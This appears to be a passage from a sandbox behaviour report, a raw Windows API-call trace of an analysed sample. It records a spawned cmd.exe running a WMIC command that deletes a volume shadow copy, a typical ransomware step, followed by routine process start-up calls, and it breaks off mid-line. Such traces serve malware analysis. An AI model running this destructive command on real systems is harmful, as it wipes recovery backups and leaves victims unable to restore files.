[0093.123] free (_Block=0x2fc940) [0093.123] free (_Block=0x2f8480) [0093.123] free (_Block=0x2fc6a0) [0093.123] free (_Block=0x2fc6c0) [0093.123] free (_Block=0x2f8200) [0093.123] free (_Block=0x2fc560) [0093.123] free (_Block=0x2fc580) [0093.123] free (_Block=0x2f80c0) [0093.123] free (_Block=0x2f6e50) [0093.123] free (_Block=0x2f6e70) [0093.123] free (_Block=0x2f8080) [0093.123] free (_Block=0x2fc5e0) [0093.123] free (_Block=0x2fc600) [0093.123] free (_Block=0x2f8140) [0093.124] free (_Block=0x2fc6e0) [0093.124] free (_Block=0x2fc700) [0093.124] free (_Block=0x2f8240) [0093.124] free (_Block=0x2fc5a0) [0093.124] free (_Block=0x2fc5c0) [0093.124] free (_Block=0x2f8100) [0093.124] free (_Block=0x2fc620) [0093.124] free (_Block=0x2fc640) [0093.124] free (_Block=0x2f8180) [0093.124] free (_Block=0x2fc660) [0093.124] free (_Block=0x2fc680) [0093.124] free (_Block=0x2f81c0) [0093.124] free (_Block=0x2fc720) [0093.124] free (_Block=0x2fc740) [0093.124] free (_Block=0x2f8280) [0093.124] CoUninitialize () [0093.146] exit (_Code=0) [0093.146] free (_Block=0x2fcd30) [0093.146] free (_Block=0x2f7ea0) [0093.146] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0093.146] free (_Block=0x2f6f40) [0093.146] free (_Block=0x2f6a40) [0093.146] free (_Block=0x2f7e60) [0093.146] free (_Block=0x2f7e20) [0093.146] free (_Block=0x2f7dd0) [0093.146] free (_Block=0x2f7d90) [0093.146] free (_Block=0x2f7d30) [0093.146] free (_Block=0x2f5a90) [0093.146] free (_Block=0x2f5a50) [0093.146] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0093.146] free (_Block=0x2fcec0) Thread: id = 131 os_tid = 0xa18 Thread: id = 132 os_tid = 0x9c8 Thread: id = 133 os_tid = 0xa1c Thread: id = 134 os_tid = 0xb04 Thread: id = 135 os_tid = 0xb40 Process: id = "16" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7a1e5000" os_pid = "0xb0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xaec" cmd_line = "cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 136 os_tid = 0xaf0 [0093.239] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efd70 | out: lpSystemTimeAsFileTime=0x1efd70*(dwLowDateTime=0x3f304290, dwHighDateTime=0x1d68245)) [0093.239] GetCurrentProcessId () returned 0xb0c [0093.239] GetCurrentThreadId () returned 0xaf0 [0093.239] GetTickCount () returned 0x114d115 [0093.239] QueryPerformanceCounter (in: lpPerformanceCount=0x1efd78 | out: lpPerformanceCount=0x1efd78*=21313185284) returned 1 [0093.240] GetModuleHandleW (lpModuleName=0x0) returned 0x4a6b0000 [0093.240] __set_app_type (_Type=0x1) [0093.241] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a6d7810) returned 0x0 [0093.241] __getmainargs (in: _Argc=0x4a6fa608, _Argv=0x4a6fa618, _Env=0x4a6fa610, _DoWildCard=0, _StartInfo=0x4a6de0f4 | out: _Argc=0x4a6fa608, _Argv=0x4a6fa618, _Env=0x4a6fa610) returned 0 [0093.241] GetCurrentThreadId () returned 0xaf0 [0093.241] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xaf0) returned 0x3c [0093.241] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0093.241] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0093.241] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0093.242] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0093.242] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efd08 | out: phkResult=0x1efd08*=0x0) returned 0x2 [0093.242] VirtualQuery (in: lpAddress=0x1efcf0, lpBuffer=0x1efc70, dwLength=0x30 | out: lpBuffer=0x1efc70*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.242] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efc70, dwLength=0x30 | out: lpBuffer=0x1efc70*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.242] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efc70, dwLength=0x30 | out: lpBuffer=0x1efc70*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.242] VirtualQuery (in: lpAddress=0xf4000, lpBuffer=0x1efc70, dwLength=0x30 | out: lpBuffer=0x1efc70*(BaseAddress=0xf4000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.242] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efc70, dwLength=0x30 | out: lpBuffer=0x1efc70*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0093.242] GetConsoleOutputCP () returned 0x1b5 [0093.242] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a6ebfe0 | out: lpCPInfo=0x4a6ebfe0) returned 1 [0093.242] SetConsoleCtrlHandler (HandlerRoutine=0x4a6d3184, Add=1) returned 1 [0093.243] _get_osfhandle (_FileHandle=1) returned 0x7 [0093.243] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0093.243] _get_osfhandle (_FileHandle=1) returned 0x7 [0093.243] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a6de194 | out: lpMode=0x4a6de194) returned 1 [0093.243] _get_osfhandle (_FileHandle=1) returned 0x7 [0093.243] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0093.243] _get_osfhandle (_FileHandle=0) returned 0x3 [0093.243] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a6de198 | out: lpMode=0x4a6de198) returned 1 [0093.244] _get_osfhandle (_FileHandle=0) returned 0x3 [0093.244] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0093.244] GetEnvironmentStringsW () returned 0x348b90* [0093.244] GetProcessHeap () returned 0x330000 [0093.244] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xa7c) returned 0x349620 [0093.244] FreeEnvironmentStringsW (penv=0x348b90) returned 1 [0093.244] GetProcessHeap () returned 0x330000 [0093.244] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x8) returned 0x348a10 [0093.244] GetEnvironmentStringsW () returned 0x348b90* [0093.244] GetProcessHeap () returned 0x330000 [0093.244] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xa7c) returned 0x34a0b0 [0093.244] FreeEnvironmentStringsW (penv=0x348b90) returned 1 [0093.244] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eebc8 | out: phkResult=0x1eebc8*=0x44) returned 0x0 [0093.244] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eebc0, lpData=0x1eebe0, lpcbData=0x1eebc4*=0x1000 | out: lpType=0x1eebc0*=0x0, lpData=0x1eebe0*=0x18, lpcbData=0x1eebc4*=0x1000) returned 0x2 [0093.244] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eebc0, lpData=0x1eebe0, lpcbData=0x1eebc4*=0x1000 | out: lpType=0x1eebc0*=0x4, lpData=0x1eebe0*=0x1, lpcbData=0x1eebc4*=0x4) returned 0x0 [0093.244] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eebc0, lpData=0x1eebe0, lpcbData=0x1eebc4*=0x1000 | out: lpType=0x1eebc0*=0x0, lpData=0x1eebe0*=0x1, lpcbData=0x1eebc4*=0x1000) returned 0x2 [0093.245] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eebc0, lpData=0x1eebe0, lpcbData=0x1eebc4*=0x1000 | out: lpType=0x1eebc0*=0x4, lpData=0x1eebe0*=0x0, lpcbData=0x1eebc4*=0x4) returned 0x0 [0093.245] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eebc0, lpData=0x1eebe0, lpcbData=0x1eebc4*=0x1000 | out: lpType=0x1eebc0*=0x4, lpData=0x1eebe0*=0x40, lpcbData=0x1eebc4*=0x4) returned 0x0 [0093.245] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eebc0, lpData=0x1eebe0, lpcbData=0x1eebc4*=0x1000 | out: lpType=0x1eebc0*=0x4, lpData=0x1eebe0*=0x40, lpcbData=0x1eebc4*=0x4) returned 0x0 [0093.245] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eebc0, lpData=0x1eebe0, lpcbData=0x1eebc4*=0x1000 | out: lpType=0x1eebc0*=0x0, lpData=0x1eebe0*=0x40, lpcbData=0x1eebc4*=0x1000) returned 0x2 [0093.245] RegCloseKey (hKey=0x44) returned 0x0 [0093.245] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eebc8 | out: phkResult=0x1eebc8*=0x44) returned 0x0 [0093.245] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eebc0, lpData=0x1eebe0, lpcbData=0x1eebc4*=0x1000 | out: lpType=0x1eebc0*=0x0, lpData=0x1eebe0*=0x40, lpcbData=0x1eebc4*=0x1000) returned 0x2 [0093.245] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eebc0, lpData=0x1eebe0, lpcbData=0x1eebc4*=0x1000 | out: lpType=0x1eebc0*=0x4, lpData=0x1eebe0*=0x1, lpcbData=0x1eebc4*=0x4) returned 0x0 [0093.245] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eebc0, lpData=0x1eebe0, lpcbData=0x1eebc4*=0x1000 | out: lpType=0x1eebc0*=0x0, lpData=0x1eebe0*=0x1, lpcbData=0x1eebc4*=0x1000) returned 0x2 [0093.245] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eebc0, lpData=0x1eebe0, lpcbData=0x1eebc4*=0x1000 | out: lpType=0x1eebc0*=0x4, lpData=0x1eebe0*=0x0, lpcbData=0x1eebc4*=0x4) returned 0x0 [0093.245] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eebc0, lpData=0x1eebe0, lpcbData=0x1eebc4*=0x1000 | out: lpType=0x1eebc0*=0x4, lpData=0x1eebe0*=0x9, lpcbData=0x1eebc4*=0x4) returned 0x0 [0093.245] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eebc0, lpData=0x1eebe0, lpcbData=0x1eebc4*=0x1000 | out: lpType=0x1eebc0*=0x4, lpData=0x1eebe0*=0x9, lpcbData=0x1eebc4*=0x4) returned 0x0 [0093.245] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eebc0, lpData=0x1eebe0, lpcbData=0x1eebc4*=0x1000 | out: lpType=0x1eebc0*=0x0, lpData=0x1eebe0*=0x9, lpcbData=0x1eebc4*=0x1000) returned 0x2 [0093.245] RegCloseKey (hKey=0x44) returned 0x0 [0093.245] time (in: timer=0x0 | out: timer=0x0) returned 0x5f517441 [0093.245] srand (_Seed=0x5f517441) [0093.245] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'\" delete" [0093.245] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'\" delete" [0093.245] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a6ec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0093.246] GetProcessHeap () returned 0x330000 [0093.246] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x218) returned 0x34ab40 [0093.246] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x34ab50, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0093.246] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a6df360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0093.246] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a6df360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0093.246] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a6df360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0093.246] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0093.246] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0093.246] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0093.246] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0093.246] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0093.246] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0093.246] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0093.246] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0093.246] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0093.246] GetProcessHeap () returned 0x330000 [0093.246] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x349620 | out: hHeap=0x330000) returned 1 [0093.246] GetEnvironmentStringsW () returned 0x348b90* [0093.246] GetProcessHeap () returned 0x330000 [0093.246] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xa94) returned 0x34ad60 [0093.247] FreeEnvironmentStringsW (penv=0x348b90) returned 1 [0093.247] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a6df360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0093.247] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a6df360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0093.247] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0093.247] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0093.247] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0093.247] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0093.247] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0093.247] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0093.247] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0093.247] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0093.247] GetProcessHeap () returned 0x330000 [0093.247] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x5c) returned 0x34b800 [0093.247] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef9d0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0093.247] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef9d0, lpFilePart=0x1ef9b0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1ef9b0*="Desktop") returned 0x25 [0093.247] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0093.247] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef6e0 | out: lpFindFileData=0x1ef6e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x34b870 [0093.247] FindClose (in: hFindFile=0x34b870 | out: hFindFile=0x34b870) returned 1 [0093.248] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x1ef6e0 | out: lpFindFileData=0x1ef6e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x34b870 [0093.248] FindClose (in: hFindFile=0x34b870 | out: hFindFile=0x34b870) returned 1 [0093.248] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0093.248] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x1ef6e0 | out: lpFindFileData=0x1ef6e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2516f480, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x2516f480, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x34b870 [0093.248] FindClose (in: hFindFile=0x34b870 | out: hFindFile=0x34b870) returned 1 [0093.248] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0093.248] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0093.248] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0093.248] GetProcessHeap () returned 0x330000 [0093.248] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x34ad60 | out: hHeap=0x330000) returned 1 [0093.248] GetEnvironmentStringsW () returned 0x34b870* [0093.248] GetProcessHeap () returned 0x330000 [0093.248] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xae8) returned 0x34c360 [0093.249] FreeEnvironmentStringsW (penv=0x34b870) returned 1 [0093.249] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a6ec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0093.249] GetProcessHeap () returned 0x330000 [0093.249] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x34b800 | out: hHeap=0x330000) returned 1 [0093.249] GetProcessHeap () returned 0x330000 [0093.249] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x4016) returned 0x34ce50 [0093.249] GetProcessHeap () returned 0x330000 [0093.249] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xe4) returned 0x349680 [0093.249] GetProcessHeap () returned 0x330000 [0093.249] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x34ce50 | out: hHeap=0x330000) returned 1 [0093.249] GetConsoleOutputCP () returned 0x1b5 [0093.249] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a6ebfe0 | out: lpCPInfo=0x4a6ebfe0) returned 1 [0093.249] GetUserDefaultLCID () returned 0x409 [0093.250] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a6e7b50, cchData=8 | out: lpLCData=":") returned 2 [0093.250] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1efae0, cchData=128 | out: lpLCData="0") returned 2 [0093.250] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efae0, cchData=128 | out: lpLCData="0") returned 2 [0093.250] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efae0, cchData=128 | out: lpLCData="1") returned 2 [0093.250] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a6fa740, cchData=8 | out: lpLCData="/") returned 2 [0093.250] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a6fa4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0093.250] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a6fa460, cchData=32 | out: lpLCData="Tue") returned 4 [0093.250] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a6fa420, cchData=32 | out: lpLCData="Wed") returned 4 [0093.251] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a6fa3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0093.251] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a6fa3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0093.251] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a6fa360, cchData=32 | out: lpLCData="Sat") returned 4 [0093.251] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a6fa700, cchData=32 | out: lpLCData="Sun") returned 4 [0093.251] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a6e7b40, cchData=8 | out: lpLCData=".") returned 2 [0093.251] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a6fa4e0, cchData=8 | out: lpLCData=",") returned 2 [0093.251] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0093.251] GetProcessHeap () returned 0x330000 [0093.251] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x0, Size=0x20c) returned 0x3497e0 [0093.251] GetConsoleTitleW (in: lpConsoleTitle=0x3497e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0093.252] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0093.252] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0093.252] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0093.252] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0093.252] GetProcessHeap () returned 0x330000 [0093.252] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x4012) returned 0x34ce50 [0093.253] GetProcessHeap () returned 0x330000 [0093.253] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x34ce50 | out: hHeap=0x330000) returned 1 [0093.255] _wcsicmp (_String1="C:\\Windows\\System32\\wbem\\WMIC.exe", _String2=")") returned 58 [0093.255] _wcsicmp (_String1="FOR", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0093.255] _wcsicmp (_String1="FOR/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0093.255] _wcsicmp (_String1="IF", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0093.255] _wcsicmp (_String1="IF/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0093.255] _wcsicmp (_String1="REM", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0093.255] _wcsicmp (_String1="REM/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0093.255] GetProcessHeap () returned 0x330000 [0093.255] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xb0) returned 0x349a00 [0093.255] GetProcessHeap () returned 0x330000 [0093.255] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x54) returned 0x349ac0 [0093.258] GetProcessHeap () returned 0x330000 [0093.258] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x9e) returned 0x349b20 [0093.258] GetConsoleTitleW (in: lpConsoleTitle=0x1ef9f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0093.259] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0093.259] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0093.259] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ef580, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1ef560, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ef560*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0093.259] GetProcessHeap () returned 0x330000 [0093.259] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x218) returned 0x349bd0 [0093.259] GetProcessHeap () returned 0x330000 [0093.259] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xe2) returned 0x349df0 [0093.259] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0093.259] GetProcessHeap () returned 0x330000 [0093.259] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x420) returned 0x331320 [0093.259] SetErrorMode (uMode=0x0) returned 0x8001 [0093.260] SetErrorMode (uMode=0x1) returned 0x0 [0093.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\wbem\\.", nBufferLength=0x208, lpBuffer=0x331330, lpFilePart=0x1ef280 | out: lpBuffer="C:\\Windows\\System32\\wbem", lpFilePart=0x1ef280*="wbem") returned 0x18 [0093.260] SetErrorMode (uMode=0x8001) returned 0x1 [0093.260] GetProcessHeap () returned 0x330000 [0093.260] RtlReAllocateHeap (Heap=0x330000, Flags=0x0, Ptr=0x331320, Size=0x54) returned 0x331320 [0093.260] GetProcessHeap () returned 0x330000 [0093.260] RtlSizeHeap (HeapHandle=0x330000, Flags=0x0, MemoryPointer=0x331320) returned 0x54 [0093.260] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\System32\\wbem\\.") returned 1 [0093.260] GetProcessHeap () returned 0x330000 [0093.260] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x48) returned 0x349ee0 [0093.260] GetProcessHeap () returned 0x330000 [0093.260] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x7c) returned 0x349f30 [0093.260] GetProcessHeap () returned 0x330000 [0093.260] RtlReAllocateHeap (Heap=0x330000, Flags=0x0, Ptr=0x349f30, Size=0x48) returned 